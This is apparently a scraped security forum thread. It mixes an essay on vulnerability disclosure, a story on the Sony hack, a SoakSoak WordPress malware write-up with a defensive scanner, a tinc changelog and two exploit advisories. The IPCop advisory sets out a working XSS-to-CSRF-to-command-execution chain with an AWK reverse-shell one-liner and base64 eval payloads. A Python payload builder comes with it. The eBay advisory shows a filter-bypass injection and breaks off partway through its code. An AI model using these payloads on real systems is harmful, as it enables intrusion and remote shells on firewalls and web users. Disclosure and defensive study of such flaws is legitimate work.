This amounts to a criminal sanction for telling people about vulnerabilities in their own computers. And because today your computer lives in your pocket and has a camera and a microphone and knows all the places you go; and because tomorrow that speeding car/computer probably won't even sport a handbrake, let alone a steering wheel—the need to know about any mode that could be exploited by malicious hackers will only get more urgent. There can be no “lawful interception” capacity for a self-driving car, allowing police to order it to pull over, that wouldn't also let a carjacker compromise your car and drive it to a convenient place to rob, rape, and/or kill you.
If those million-eyed, fast-moving, deep-seated computers are designed to obey their owners; if the policy regulating those computers encourages disclosure of flaws, even if they can be exploited by spies, criminals, and cops; if we're allowed to know how they're configured and permitted to reconfigure them without being overridden by a distant party—then we may enter a science fictional world of unparalleled leisure and excitement.
But if the world's governments continue to insist that wiretapping capacity must be built into every computer; if the state of California continues to insist that cell phones have kill switches allowing remote instructions to be executed on your phone that you can't countermand or even know about; if the entertainment industry continues to insist that the general-purpose computer must be neutered so you can't use it to watch TV the wrong way; if the World Wide Web Consortium continues to infect the core standards of the web itself to allow remote control over your computer against your wishes—then we are in deep, deep trouble.
The Internet isn't just the world's most perfect video-on-demand service. It's not simply a better way to get pornography. It's not merely a tool for planning terrorist attacks. Those are only use cases for the net; what the net is, is the nervous system of the 21st century. It's time we started acting like it.
-
http://filmehd.net/the-town-that-dreaded-sundown-2014-filme-online.html
It's new; I can say it's a masterpiece of a film! 10 out of 10.
-
Happy holidays to everyone!
-
face palm...
how can I request political asylum in Zimbabwe?
-
2
-
-
@Nytro or whoever has time to look into the images, because they return 404
whatever site I put images from, it still returns 404...
Tested: Mozilla / IE / Chrome
I did TC, it's resolved!
-
Just look at how stupid he is:
What is that, man? A router? You can't even read English to see what's written there? You're clueless in this field anyway, but at least read what it says.
man, you're hopeless, it's about a version of a firewall and it's been patched!
stop commenting nonsense + you double-posted, someone ban this kid!
"router" where's the mistake, kid?
I probably expressed myself badly, but if you're not capable of understanding, that's a second matter!
it's for a firewall version specific to a certain kind of router.
-
Sony was forced to pull the cinema release of "The Interview," scheduled for Christmas Day, after the hacker group Guardians of Peace (GOP) threatened to attack any theater that showed the film. But the studio says it will release the controversial North Korea-baiting film through alternative channels.
HACKERS WARNED OF TERROR ATTACK
The massive hacking attack against Sony Pictures Entertainment is getting worse day by day. The hack has so far exposed about 200 gigabytes of confidential company data, from upcoming movie scripts to sensitive employee data, celebrities' phone numbers and their travel aliases, along with high-quality copies of five unreleased films, marking it as the most severe hack in history.
A week ago, the hacker group GOP, which has claimed responsibility for the damaging Sony cyber-attack, demanded that Sony cancel the release of "The Interview", the Seth Rogen and James Franco comedy about a TV host and his producer being recruited to assassinate North Korean dictator Kim Jong Un, citing terror threats against movie theatres.
When the GOP group sent a threatening email to Sony executives at the beginning of the month, it did not even ask the company to cancel the release of The Interview. The group never released any statement regarding the movie; only later, with the second leak, did it demand the cancellation. It seems the hackers picked up this idea from media speculation and pinned the blame on North Korea to make the drama more interesting.
PULLING THE INTERVIEW – A VERY COWARD ACTION
Not just GOP: the studio has been threatened by a number of hacker groups, including one identifying itself as Anonymous. In a statement on Monday addressed to Sony Entertainment CEO Michael Lynton, that group warned the studio to release "The Interview" as originally planned or face more damaging hacks.
The Anonymous group also denies that the Sony hackers are linked to North Korea, despite the FBI’s revelation Friday that their probe had determined as much. The group criticized Sony for pulling the movie, saying it was a "very cowardly" act of both the CEO and the organization, alleging it showed "panicking at first sight of trouble."
In fact, President Barack Obama also expressed disappointment in Sony’s decision to pull the film and announced Friday that the studio had made "a mistake" by withdrawing the movie, but said it was the private company's right to do so.
SONY INTENDS TO RELEASE THE INTERVIEW
In response, Michael Lynton, the studio's chief executive, said that it had "not caved" to the hackers who harmed the company, that the studio still intends to release its controversial film, and that it is exploring ways to let audiences see it, possibly via YouTube.
"We would still like the public to see this movie, absolutely," Lynton said during an interview. "There are a number of options open to us. And we have considered those, and are considering them."
BITTORRENT CAME UP WITH A GOOD IDEA
Meanwhile, the popular file-sharing company BitTorrent has suggested a way for Sony to release the controversial film: its new digital-distribution paygate for artists, BitTorrent Bundle, a paid service. The San Francisco-based company believes BitTorrent Bundle is the best way to satisfy both online downloaders and Sony's desire to release the film.
According to BitTorrent, it's a totally "safe and legal way" for Sony to release "The Interview", with up to 20,000 creators and rights holders currently using the publishing platform. Notably, BitTorrent Bundle had released "The Act Of Killing," a 2012 Oscar-nominated documentary account of mass murder in 1960s Indonesia that stirred controversy for criticizing government officials. The feature was downloaded over 3.5 million times.
Now let's wait and see what Sony decides about the BitTorrent offer. The studio has never been a fan of torrents, so accepting the file-sharing company's offer would be an unlikely deal, but it sounds like a convenient one for both Sony and viewers.
-
The attackers behind the SoakSoak malware campaign are continuing to modify their tactics and have infected a new group of Web sites. The file into which the attackers inject their JavaScript has also changed.
Last week, Google took the step of blacklisting thousands of sites that had been infected by SoakSoak. The malware targets WordPress sites, and the attackers inject their malicious code into files served by the site. Originally, the attackers were modifying wp-includes/template-loader.php; once that file is modified, the attackers' JavaScript appears on every page of an infected site, and that code then downloads malware from a remote domain.
The attackers have now begun targeting a different file, wp-includes/js/json2.min.js, which is being modified to load a malicious Flash file.
“The hidden iFrame URL in swfobjct.swf now depends on another script from hxxp://ads .akeemdom . com/db26, also loaded by malware in json2.min.js,” researchers at Sucuri wrote in an analysis of the attack.
The SoakSoak malware campaign is targeting older versions of a popular WordPress plugin called RevSlider. Versions prior to 4.2 are being exploited, Denis Sinegubko of Sucuri said. The vulnerability in the plugin was disclosed several months ago and was discussed on underground forums.
“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes,” Daniel Cid of Sucuri wrote last week.
The vulnerability was patched silently by the plugin’s developers, but sites that have not been updated are still vulnerable to these kinds of attacks.
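The three checks a site owner would actually run after reading the above, as an added example written for this page (it is not Sucuri's or WordPress's tooling): read the RevSlider plugin header and flag versions before 4.2, compare wp-includes core files against known-good SHA-256 hashes, and grep wp-includes for the indicators quoted in the article (swfobjct.swf, ads.akeemdom.com). The sample WordPress tree, the "remote script src"/iframe heuristics and the path wp-content/plugins/revslider/revslider.php are assumptions constructed for the demo, not data from the campaign.

```python
"""Offline triage helper for the SoakSoak indicators described above.
Example code written for this page, not Sucuri's or WordPress's own tooling."""
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators quoted in the article: the tampered wp-includes/js/json2.min.js
# loads swfobjct.swf and a script from ads.akeemdom.com/db26.
IOC_PATTERNS = {
    "swfobjct.swf": re.compile(r"swfobjct\.swf", re.I),
    "ads.akeemdom.com": re.compile(r"ads\.akeemdom\.com", re.I),
}
# Generic heuristics (my assumption, not from the article): a core file in
# wp-includes should never embed an iframe or load a script from a remote host.
HEURISTIC_PATTERNS = {
    "iframe tag": re.compile(r"<iframe", re.I),
    "remote script src": re.compile(r"\.src\s*=\s*['\"]https?://", re.I),
}
# RevSlider versions before 4.2 are the ones being exploited, per the article.
REVSLIDER_FIXED = (4, 2)


def plugin_version(header_text):
    """Extract 'Version: x.y.z' from a WordPress plugin header comment."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", header_text, re.M)
    return m.group(1) if m else None


def version_tuple(version):
    return tuple(int(p) for p in version.split("."))


def revslider_vulnerable(version):
    return version_tuple(version) < REVSLIDER_FIXED


def find_indicators(text):
    """Return the names of every IOC and heuristic pattern that matches."""
    hits = [n for n, p in IOC_PATTERNS.items() if p.search(text)]
    hits += [n for n, p in HEURISTIC_PATTERNS.items() if p.search(text)]
    return hits


def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def scan_site(root, core_baseline):
    """Walk a WordPress tree: check RevSlider's version, compare core files
    against known-good hashes, and grep wp-includes for the indicators above."""
    findings = {"revslider_version": None, "revslider_vulnerable": False,
                "modified_core": [], "ioc_hits": {}}
    rev = root / "wp-content/plugins/revslider/revslider.php"  # assumed main file
    if rev.exists():
        ver = plugin_version(rev.read_text())
        findings["revslider_version"] = ver
        findings["revslider_vulnerable"] = bool(ver) and revslider_vulnerable(ver)
    for rel, good_hash in core_baseline.items():
        p = root / rel
        if p.exists() and sha256_of(p) != good_hash:
            findings["modified_core"].append(rel)
    for p in (root / "wp-includes").rglob("*"):
        if p.is_file():
            hits = find_indicators(p.read_text(errors="ignore"))
            if hits:
                findings["ioc_hits"][str(p.relative_to(root))] = hits
    return findings


# Constructed stand-ins, not the real json2.min.js nor the real injected code.
CLEAN_JSON2 = "/* json2.min.js - constructed stand-in */\nvar JSON;JSON||(JSON={});\n"
INFECTED_JSON2 = CLEAN_JSON2 + (
    "var s=document.createElement('script');s.src='http://ads.akeemdom.com/db26';"
    "document.head.appendChild(s);swfobject.embedSWF('swfobjct.swf','x','1','1');\n"
)


def build_sample_site(infected=True):
    """Constructed sample tree in a temp dir (not real data). Returns (root, baseline)."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-content/plugins/revslider").mkdir(parents=True)
    (root / "wp-content/plugins/revslider/revslider.php").write_text(
        "<?php\n/*\nPlugin Name: Slider Revolution\nVersion: 4.1.4\n*/\n")
    js = root / "wp-includes/js"
    js.mkdir(parents=True)
    baseline = {"wp-includes/js/json2.min.js":
                hashlib.sha256(CLEAN_JSON2.encode()).hexdigest()}
    (js / "json2.min.js").write_text(INFECTED_JSON2 if infected else CLEAN_JSON2)
    return root, baseline


if __name__ == "__main__":
    site, base = build_sample_site()
    for key, value in scan_site(site, base).items():
        print(f"{key}: {value}")
```

On a real install, replace the constructed baseline with hashes taken from a pristine copy of the same WordPress release; the hash comparison is what catches a modified template-loader.php or json2.min.js even when the injected code uses a domain not in the indicator list.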
-
tinc is a Virtual Private Network (VPN) daemon that uses tunneling and encryption to create a secure private network between multiple hosts on the Internet. This tunneling allows VPN sites to share information with each other over the Internet without exposing any information.
Changes: Documentation updates. Support linking against -lresolv on Mac OS X. Fixed scripts on Windows when using the ScriptsInterpreter option. Allowed a minimum reconnect timeout to be specified. Added support to PriorityInheritance on IPv6 sockets.
-
######################################################################
# Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution
# Date: 21/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php
# Version: 2.1.4
# Category: Remote Command Execution
# Google dork:
# Tested on: IPCop distribution
######################################################################
IPCop firewall/router distribution description :
======================================================================
IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework.
Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly.
IPCop includes a simple, user managed update mechanism to install security updates when required.
In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain a Remote Command Execution (reverse-shell).
In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse-shell can be obtained with only one URL.
Proof of Concept 1 :
======================================================================
A non-persistent XSS in a GET parameter is available in ipinfo.cgi. The injection can be URL-encoded for certain browsers.
This XSS works on IE and affects IPCop versions <= 2.1.2 (patched in the 2.1.3 upgrade).
File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);
PoC:
https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>
Proof of Concept 2 :
======================================================================
CSRF exploit bypass from previous XSS.
IPCop is protected against CSRF attacks by Referer checking on every page.
It is possible to bypass this protection with the XSS detailed above.
To do so, load a third-party JS script through the XSS and make Ajax requests from within the IPCop page context, so that the browser sends the expected Referer.
This XSS works on IE and affects IPCop versions <= 2.1.2 (patched in the 2.1.3 upgrade).
File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
&Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);
PoC :
Host a third party JS script on a web server accessible from IPCop. In this JS script, load JQuery dynamically and perform any AJAX request to an IPCop targeted page.
Every such AJAX request bypasses the CSRF protection.
* Third-party JS script, hosted at http://<PENTESTER_WEBSITE>/x.js:
var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq); // jquery dynamic loading
function loadX(){
  // Runs inside the IPCop page's origin, so the browser sends an IPCop Referer
  // and the session cookie: the Referer-based CSRF check is satisfied.
  $.ajax({
    type: 'POST',
    url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>",
    contentType: 'application/x-www-form-urlencoded;charset=utf-8',
    dataType: 'text',
    data: '<YOUR_DATA>'
  }); // payload of your choice
}
setTimeout("loadX()",2000); // give jQuery two seconds to load before $ is used
* XSS to load dynamically this third party script :
var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script);
* Escape this string with escape() Javascript method :
%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09
* Make the final URL with XSS in GET param that load dynamically the third party script (IE) :
https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script>
Proof of Concept 3 :
======================================================================
Remote Command Execution in the iptablesgui.cgi file. This file is covered by the Referer-based CSRF protection.
Affected version <= 2.1.4 (patched in 2.1.5 upgrade).
File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) :
$output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`;
The $cgiparams{'TABLE'} value is not sanitized before being interpolated into the shell command line, so the "TABLE" POST parameter can be replaced with arbitrary data.
To chain commands in this instruction, only || can be used (&& is not usable), so the first part of the command needs to return a non-zero (false) status; a trailing # then comments out the 2>&1 that follows on the original line.
It can be done with no additional param :
/usr/local/bin/iptableswrapper <NOTHING HERE> || <my personnal command will be executed here>
So the RCE can be exploited with this PoC (if the Referer header matches the IPCop URL):
<html>
<body>
<form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
<input type='hidden' name='TABLE' value='||touch /tmp/x;#' />
<input type='hidden' name='CHAIN' value='' />
<input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>
Note that the ACTION POST parameter depends on the language configured on IPCop (Rafra%C3%AEchir is the French "Rafraîchir" button label).
Proof of Concept 4 :
======================================================================
Finally, with these three previous PoC, it's possible to combine all the mechanisms to gain a full reverse-shell on IPCop.
IPCop ships neither netcat nor telnet, socat, Python, Ruby, PHP, etc.
The only way to get a reverse shell is to use a Perl or AWK technique. This PoC uses the AWK technique:
(From ASafety Reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/)
* The reverse-shell one-line with AWK is :
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
* To bypass the IPCop input filter, encode this command in base64 (after replacing <IP> and <PORT>):
YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA==
* Insert a \n after each block of 64 characters of the base64 output (echo -e turns them into real newlines, giving the line-wrapped base64 that openssl enc -a -d expects; a single long line is not accepted without -A):
YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==
* This payload can be echo'ed and decoded with openssl, on the fly, on IPCop:
echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d
* To execute this payload, add backticks and eval call :
eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`
* Your payload is ready to be used into TABLE POST param in iptablesgui.cgi, like the previous PoC :
||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#
* Full PoC (IPCop <= 2.1.2, RXSS patched in 2.1.3 upgrade but RCE available to 2.1.4, patched in 2.1.5 upgrade)
(if the referer is defined to IPCop URL, and a netcat is listening # nc -l -vv -p 1337) :
<html>
<body>
<form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
<input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' />
<input type='hidden' name='CHAIN' value='' />
<input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>
Note that <IP> and <PORT> are not filled in in the previous payload; you need to reproduce the steps above with your own listener address and port.
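The encode / wrap / wrap-in-eval / URL-encode steps of PoC 4 above, scripted so the listener address is filled in before encoding. This is an added example written for this page, not the advisory author's tooling: the AWK one-liner is the one quoted above, the 64-column wrap and the `||eval \`echo -e ... | openssl enc -a -d\`;#` wrapper follow the steps above, and the address 192.0.2.10 in the demo is a documentation placeholder. `decode_as_target_would` replays offline what the target shell does (echo -e plus base64 decode) so you can confirm the payload reproduces the command before sending it.

```python
"""Builds the TABLE payload for iptablesgui.cgi by following the steps above.
Added example for this page, not the advisory author's own tooling."""
import base64
from urllib.parse import urlencode

# The AWK reverse-shell one-liner quoted in the advisory, with its <IP>/<PORT> placeholders.
AWK_TEMPLATE = (
    "awk 'BEGIN {s = \"/inet/tcp/0/<IP>/<PORT>\"; while(42) { do{ printf \"shell>\" |& s; "
    "s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } "
    "while(c != \"exit\") close(s); }}' /dev/null"
)


def awk_reverse_shell(ip, port):
    """Fill in the listener address; the advisory's base64 still carries the placeholders."""
    return AWK_TEMPLATE.replace("<IP>", ip).replace("<PORT>", str(port))


def wrapped_base64(command, width=64):
    """Base64-encode and insert a literal backslash-n after every `width` characters.
    echo -e turns those into real newlines, which is the line-wrapped format
    `openssl enc -a -d` expects (it needs -A to accept a single long line)."""
    encoded = base64.b64encode(command.encode()).decode()
    return "\\n".join(encoded[i:i + width] for i in range(0, len(encoded), width))


def table_payload(command):
    """`||` runs our command because iptableswrapper fails with an empty table
    argument; the trailing `#` comments out the `2>&1` that follows in the CGI."""
    return '||eval `echo -e "%s" | openssl enc -a -d`;#' % wrapped_base64(command)


def post_body(command, action="Rafra\u00eechir"):
    """URL-encoded form body for the CSRF page or the $.ajax data field.
    ACTION is the submit-button label and depends on IPCop's configured language."""
    return urlencode({"CHAIN": "", "ACTION": action, "TABLE": table_payload(command)})


def decode_as_target_would(payload):
    """Replay what the target shell does, offline: undo the echo -e escapes and
    base64-decode, to confirm the payload reproduces the original command."""
    start = payload.index('echo -e "') + len('echo -e "')
    end = payload.index('"', start)
    wrapped = payload[start:end].replace("\\n", "\n")
    return base64.b64decode(wrapped).decode()


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address (placeholder); use your own listener.
    shell = awk_reverse_shell("192.0.2.10", 1337)
    assert decode_as_target_would(table_payload(shell)) == shell
    print(post_body(shell))
```

The body printed by `post_body` is what goes into the hidden form above or into the `data:` field of the x.js script; the base64 alphabet contains no double quote, so the `echo -e "..."` quoting cannot be broken by the encoded command.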
* With the XSS method to bypass CSRF Referer checking, the third party JS script can be :
var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
function loadX(){
$.ajax({
type: 'POST',
url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi",
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23'
});
}
setTimeout("loadX()",2000);
* A demonstration video was recorded as a PoC (against IPCop 2.0.6, but it works on IPCop 2.1.2): https://www.youtube.com/watch?v=ovhogZGHyMg
Solution:
======================================================================
- To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3.
- To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5.
Report timeline :
======================================================================
2013-03-31 : Team alerted with details, PoC and video (via Sourceforge)
2013-04-09 : Second alert sent to the team (via Sourceforge)
2013-04-25 : Third alert sent to the IPCop english support forum
2013-04-25 : PoC added in private on the sourceforge bug tracker, no response
2013-04-30 : Ticket priority change from 5 to 8, no response.
2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket.
2014-12-21 : Public article on ASafety and public advisory
Additional resources :
======================================================================
- www.ipcop.org
- sourceforge.net/p/ipcop/bugs/807/
- sourceforge.net/projects/ipcop/
- www.synetis.com
- www.asafety.fr
- www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution
- www.youtube.com/watch?v=ovhogZGHyMg
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr -
######################################################################
# Exploit Title: eBay.com ocsnext sub-domain Reflected CSS injection
# Date: 20/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ebay.com
# Version: /
# Category: Reflected CSS injection
# Google dork:
# Tested on: eBay.com ocsnext sub-domain
######################################################################
eBay description :
======================================================================
eBay Inc. is an American multinational corporation and e-commerce company, providing consumer-to-consumer and business-to-consumer sales services via the Internet.
It is headquartered in San Jose, California, United States. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble;
it is a multi-billion dollar business with operations localized in over thirty countries.
The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide.
Vulnerability description :
======================================================================
A CSS injection is available in the ocsnext.ebay.com sub-domain.
Through this vulnerability, an attacker could tamper with the page rendering and potentially inject JavaScript to obtain a Reflected XSS (RXSS), redirect victims to fake eBay portals, or capture eBay users' credentials such as cookies.
The injection is in the GET "query" variable, which is not properly sanitized before being reflected into the page.
Proof of Concept 1 :
======================================================================
A non-persistent CSS injection, and potentially an RXSS, in the "query" GET parameter is available on the ocsnext.ebay.com sub-domain.
Tested with Firefox 30.0 and Chrome 36.0.1985.125.
The injection (HTML, CSS and potentially JavaScript) lands on a page of the ocsnext.ebay.com domain (*.ebay.com) reached by an authenticated user of eBay's services.
The injection is used to define arbitrary attributes on an input tag type "hidden":
<input type="hidden" name="query" value="[INJECTION]" />
It is possible to define the "style" attribute to load CSS on the fly and, depending on the browser and version, possibly turn it into an XSS
(-moz-binding, expression(), background-image: url(javascript:)) ...
Characters like "<" or ">" are encoded, and strings like "http://" are filtered. To evade the "http://" filter, the vector "http:/%26%23x0D%3B/" is used: after URL decoding it reads http:/&#x0D;/, so the literal string http:// never reaches the filter, while the browser decodes the &#x0D; entity (a carriage return) inside the attribute value.
PoC:
http://ocsnext.ebay.com/ocs/cusr?query=x" style="background-image:url('http:/%26%23x0D%3B/www.asafety.fr/images/logo.png')&domain=TechnicalIssues&from=404_error
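Why the filter bypass works, and what the fix looks like, as an added example written for this page (not eBay's code). The filter is my reconstruction of the behaviour the advisory reports (angle brackets encoded, the literal string http:// rejected); `render_vulnerable` reflects the value into the hidden input exactly as shown above, and `render_fixed` attribute-encodes the whole value. A small HTML parser then shows what the browser would see in each case: the injected `style` attribute with a decoded carriage return in the vulnerable output, and a single harmless `value` in the fixed one.

```python
"""Models the reflection and the filter bypass described above. Added example for
this page; the filter is my reconstruction of the reported behaviour, not eBay's code."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# The advisory's PoC value for the "query" parameter, before the server URL-decodes it.
POC_QUERY = "x\" style=\"background-image:url('http:/%26%23x0D%3B/www.asafety.fr/images/logo.png')"


def decode_query(raw_param):
    """What the application sees after URL decoding: %26%23x0D%3B becomes the
    HTML entity &#x0D; (a carriage return), so the literal http:// never appears."""
    return unquote(raw_param)


def naive_filter(query):
    """Reconstructed filter: block http://, entity-encode angle brackets. It
    ignores the double quote, which is what lets the value escape the attribute."""
    if "http://" in query:
        return None
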